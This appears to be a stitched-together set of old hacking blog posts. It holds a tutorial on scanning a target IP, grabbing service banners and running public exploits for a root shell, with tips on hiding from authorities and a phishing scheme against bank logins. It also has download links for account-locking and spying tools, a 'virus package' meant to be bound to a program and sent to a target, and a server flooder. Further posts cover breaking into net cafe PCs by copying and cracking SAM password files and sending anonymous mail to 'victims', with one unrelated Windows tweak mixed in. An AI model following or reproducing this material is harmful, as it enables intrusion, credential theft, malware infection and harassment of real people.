So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown

In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.

2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.

220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

Yahoo Account Spammer/Locker

2008-08-18T00:31:00.001-07:00

What this tool basically does is lock the targets account. its good if you want to ~censored~ with someone on a chat.

Download:

Code:

http://rapidshare.com/files/138041642/Y__Account_Locker_by_simmer.rar

Spy Yahoo 2

2008-08-18T00:30:00.001-07:00

Spy Yahoo 2

It's Dectectable by Most A.V but a good tool 4 yahoo Guys

Screenshot

Download:

Code:

http://rapidshare.com/files/125681801/SpyYahoo-By_Outlawz.zip

Virus Package - Dangerous

2008-08-18T00:29:00.001-07:00

Virus Package - Dangerous

This little package will download about 50 different viruses onto the target computer so just bind it with any program and send it to your target, they won't forget it.

Code:

http://rapidshare.com/files/126226038/Be_Careful.zip

Server Flooder

2008-08-18T00:27:00.002-07:00

Server Flooder

Download:

Code:

http://rs247.rapidshare.com/files/121345975/Ventrilo_Flooder.zip

Hack into net cafe...

2008-08-17T21:50:00.001-07:00

This tutorial is to learn how to hack into net cafe.....open a closed pc in a net cafe...

We will consider net cafe in 2 categories:

1.Less secure.
2.More secure.

1. Less secure net cafe:

Ok all net cafe has some kind of program like cafe agent or some net administration tool...(looks like a trojan)

This tool allow a computer that has the program-client to remote control another computer in a network... in our case usually lan(local area network)

first you must see how secure is this ok first go with Ctrl+alt+Del perhaps task manager will appear or some panel...

If you see task manager find the application that controls you and terminate it...
or log off...

If you log off you can see the username of the user that is currently running...

2. More secure net cafe:

Do a restart and press F8 continiously before windows boot...

you will go to a menu then select safe mode... and boot
now you are in...

you can copy the files c:/windows/repair/sam and c:/windows/repair/system on a disk

sam:holds the account passwords(encrypted)
system:has the key algorithm that is used to crack the hashes

then go to your home pc download a sam crack tool recommend(saminside) and crack the administrator password...

Go to the next cafe do some log off(by safe mode or Ctrl+alt+Del) and log in as admin change the pass and you got root...

Enjoy HaCkInG....

Anonymous mailers...

2008-08-17T21:48:00.000-07:00

Use the below mentioned codes to send anonymous mails to victims.....

Code:
http://www.appleinsider.com/anonymous_mailer.php
http://www.behidden.com/user_home_page_emailer.php
http://www.advancescripts.com/detailed/122.html
http://www.monkeys.com/formmailer/
http://www.uvm.edu/~ashawley/spoof.html

Code:
http://www.download.com/Data-s-Anonymous-Mailer/3000-2369_4-10401819.html
http://www.brothersoft.com/downloads/anonymous-email.html

Sharpmail.co.uk's Anonymous Email & SMS!

Code:
http://www.sharpmail.co.uk/

Code:
http://www.theanonymousemail.com/
http://www.anonymousspeech.com/
http://www.advicebox.com/
http://www.1netcentral.com/anonymous-email.html
http://anonymous.to/
http://www.mytrashmail.com/
http://deadfake.com/
http://deadfake.com/Send.aspx
http://www.pcgraffiti.com/
http://www.mutemail.com/
http://www.gilc.org/speech/anonymous/remailer.html
http://www.neomailbox.com/
http://www.sendanonymousemail.com/
http://www.freedownloadscenter.com/Best/anonymous-email.html
http://www.emailman.com/anonymous/
http://www.emailprivacy.info/remailers
http://www.swarmail.com/
http://www.fakemailz.com/
http://www.findnot.com/
http://cyberatlantis.com/anonymous_email.php
http://lifehacker.com/software/email/send-anonymous-email-or-sms-186198.php
http://anonymous-email-protection.qarchive.org/
http://www.cryptoheaven.com/anonymous-email/anonymous-email.htm
http://www.thinksecret.com/contact/anonymous.html
http://web.mit.edu/ideas/www/contact_anony.htm
http://www.infoanarchy.org/en/Anonymous_E-Mail
http://shareme.com/showtop/sending-anonymous-email.html
http://www.vicman.net/lib/email/anonymous
http://www.downloadthat.com/windows/catalog/Anonymous_Bulk_Email
http://www.rollyo.com/ereheman/anonymous_email/
http://technorati.com/tag/anonymous+email
http://anonymous-e-mail.qarchive.org/
http://searchexchange.techtarget.com/originalContent/0,289142,sid43_gci1175062,00.html
http://www.senditfake.com/

Enjoy HaCkInG.....

Change Text on XP Start Button...

2008-08-17T21:47:00.000-07:00

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article we have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Mcft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get Resource HackerTM from: http://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case we used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. we won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.

Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Mcft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]

Enjoy HaCkInG....